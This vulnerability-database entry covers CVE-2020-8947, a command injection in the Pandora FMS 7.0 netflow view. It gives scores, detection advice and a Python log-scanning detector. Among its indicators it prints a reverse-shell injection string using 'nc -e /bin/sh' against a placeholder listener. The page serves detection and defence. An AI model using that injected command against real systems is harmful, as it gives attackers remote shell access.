CVE-2020-8947
published 2020-02-12

Priority: P2 · 64 · high · 7.2 · CVSS 3.1
Vector: AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 22.48% (97.4th percentile)

functions_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf_live_view ip_dst, dst_port, or src_port parameter, a different vulnerability than CVE-2019-20224.

Affected

1 range
Vendor | Product | Version range | Fixed in
artica | pandora_fms | |

Detection & IOCs (extracted from sources)

url: /pandora_console/index.php?login=1
url: /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0
path: functions_netflow.php
command: ";nc -e /bin/sh <listenerIP> <listenerPort> #
  • Detect POST requests to the netflow live view endpoint with shell metacharacters (e.g., double-quote, semicolon) in the ip_dst, ip_src, dst_port, or src_port POST body parameters.
  • Alert on POST requests to /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view containing nc -e /bin/sh or similar reverse-shell payloads in form fields.
  • Monitor for the exploit's characteristic User-Agent string 'Mozilla/5.0 Gecko/20100101 Firefox/72.0' combined with POST requests to the Pandora FMS netflow endpoint, as this is hardcoded in the public exploit.
  • The exploit requires prior authentication; correlate a successful login POST to /pandora_console/index.php?login=1 immediately followed by a POST to the nf_live_view endpoint from the same session/IP.
  • Payload position may vary across ip_src, dst_port, or src_port fields in addition to ip_dst; inspect all four POST parameters for shell metacharacters.
  • Exploitation requires valid credentials; unauthenticated attackers cannot reach the vulnerable code path directly.
  • This is a distinct vulnerability from CVE-2019-20224 despite affecting the same netflow functionality; ensure detections cover both CVEs independently.
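
The detection notes above can be combined into one pass over HTTP records, shown here as an added example that is not part of the original entry or of Pandora FMS. It assumes a proxy or WAF log that captures POST bodies; the record layout, the metacharacter set and the sample events are constructed for illustration, and the login correlation is by source address only.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters this page names as possible payload positions.
WATCHED_PARAMS = ("ip_dst", "ip_src", "dst_port", "src_port")
# Assumed starting set of shell metacharacters; tune for your data.
SHELL_META = re.compile(r'["\'`;|&$()<>\n#]')
EXPLOIT_UA = "Mozilla/5.0 Gecko/20100101 Firefox/72.0"  # quoted on this page

def _query(method, url):
    """Return the parsed query of a POST to index.php, else None."""
    parts = urlsplit(url)
    if method.upper() != "POST" or not parts.path.endswith("/index.php"):
        return None
    return parse_qs(parts.query)

def scan(events):
    """events: time-ordered dicts with src, method, url, ua, body (urlencoded)."""
    logged_in, alerts = set(), []
    for ev in events:
        query = _query(ev["method"], ev["url"])
        if query is None:
            continue
        if "login" in query:  # login POST seen: remember the source address
            logged_in.add(ev["src"])
            continue
        if "operation/netflow/nf_live_view" not in query.get("sec2", []):
            continue
        form = parse_qs(ev["body"], keep_blank_values=True)
        hits = [p for p in WATCHED_PARAMS
                if any(SHELL_META.search(v) for v in form.get(p, []))]
        if hits:
            alerts.append({"src": ev["src"], "params": hits,
                           "exploit_ua": ev["ua"] == EXPLOIT_UA,
                           "after_login": ev["src"] in logged_in})
    return alerts

NETFLOW = "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0"
SAMPLE_EVENTS = [  # constructed records, documentation-range addresses
    {"src": "198.51.100.7", "method": "POST", "ua": EXPLOIT_UA, "body": "",
     "url": "/pandora_console/index.php?login=1"},
    {"src": "198.51.100.7", "method": "POST", "ua": EXPLOIT_UA, "url": NETFLOW,
     "body": "ip_dst=%22%3BPLACEHOLDER+%23&dst_port=443"},
    {"src": "192.0.2.10", "method": "POST", "ua": "ExampleBrowser/1.0", "url": NETFLOW,
     "body": "ip_dst=10.0.0.5&dst_port=443&src_port="},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The User-Agent and login flags are reported as context on an alert rather than required for it, since either can be absent while the metacharacter match still holds.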

CVSS provenance

nvd · v3.1 · 7.2 · HIGH · CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 9.0 · CRITICAL · AV:N/AC:L/Au:S/C:C/I:C/A:C